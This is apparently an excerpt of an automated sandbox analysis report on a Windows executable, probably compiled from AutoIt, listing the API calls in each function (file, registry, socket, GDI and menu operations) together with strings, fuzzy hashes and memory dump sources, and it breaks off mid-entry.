                                                                                              • API String ID: 586820018-3724388283
                                                                                              • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                              • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                              • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                              • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                              APIs
                                                                                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                              • _wcscat.LIBCMT ref: 0044BCAF
                                                                                              • _wcslen.LIBCMT ref: 0044BCBB
                                                                                              • _wcslen.LIBCMT ref: 0044BCD1
                                                                                              • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2326526234-1173974218
                                                                                              • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                              • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                              • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                              • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                              APIs
                                                                                                • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                              • _wcslen.LIBCMT ref: 004335F2
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                              • GetLastError.KERNEL32 ref: 0043362B
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                              • _wcsrchr.LIBCMT ref: 00433666
                                                                                                • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                              • String ID: \
                                                                                              • API String ID: 321622961-2967466578
                                                                                              • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                              • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                              • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                              • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                              • API String ID: 1038674560-2734436370
                                                                                              • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                              • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                              • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                              • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                              • LoadStringW.USER32(00000000), ref: 00434060
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                              • LoadStringW.USER32(00000000), ref: 00434078
                                                                                              • _wprintf.LIBCMT ref: 004340A1
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                              Strings
                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                              • API String ID: 3648134473-3128320259
                                                                                              • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                              • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                              • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                              • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                              • __lock.LIBCMT ref: 00417981
                                                                                                • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                              • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                              • __lock.LIBCMT ref: 004179A2
                                                                                              • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                              • String ID: KERNEL32.DLL$pI
                                                                                              • API String ID: 637971194-197072765
                                                                                              • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                              • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                              • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                              • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _memmove$_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 1938898002-0
                                                                                              • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                              • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                              • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                              • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                              • _memmove.LIBCMT ref: 0044B555
                                                                                              • _memmove.LIBCMT ref: 0044B578
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 2737351978-0
                                                                                              • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                              • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                              • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                              • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                              APIs
                                                                                              • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                              • __calloc_crt.LIBCMT ref: 00415246
                                                                                              • __getptd.LIBCMT ref: 00415253
                                                                                              • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                              • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                              • _free.LIBCMT ref: 0041529E
                                                                                              • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                              • String ID:
                                                                                              • API String ID: 3638380555-0
                                                                                              • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                              • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                              • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                              • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Copy$ClearErrorInitLast
                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                              • API String ID: 3207048006-625585964
                                                                                              • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                              • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                              • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                              • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                              APIs
                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                              • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                              • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                              • _memmove.LIBCMT ref: 004656CA
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                              • WSACleanup.WSOCK32 ref: 00465762
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                              • String ID:
                                                                                              • API String ID: 2945290962-0
                                                                                              • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                              • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                              • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                              • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                              APIs
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                              • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                              • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                              • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1457242333-0
                                                                                              • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                              • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                              • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                              • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                              APIs
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConnectRegistry_memmove_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 15295421-0
                                                                                              • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                              • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                              • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                              • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                              APIs
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              • _wcstok.LIBCMT ref: 004675B2
                                                                                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                              • _wcscpy.LIBCMT ref: 00467641
                                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                              • _wcslen.LIBCMT ref: 00467793
                                                                                              • _wcslen.LIBCMT ref: 004677BD
                                                                                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                              • String ID: X
                                                                                              • API String ID: 780548581-3081909835
                                                                                              • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                              • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                              • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                              • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                              APIs
                                                                                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                              • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                              • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                              • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                              • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                              • CloseFigure.GDI32(?), ref: 0044751F
                                                                                              • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                              • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                              • String ID:
                                                                                              • API String ID: 4082120231-0
                                                                                              • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                              • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                              • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                              • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                              APIs
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                              • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2027346449-0
                                                                                              • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                              • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                              • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                              • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                              APIs
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                              • GetMenu.USER32 ref: 0047A703
                                                                                              • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                              • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                              • _wcslen.LIBCMT ref: 0047A79E
                                                                                              • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                              • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
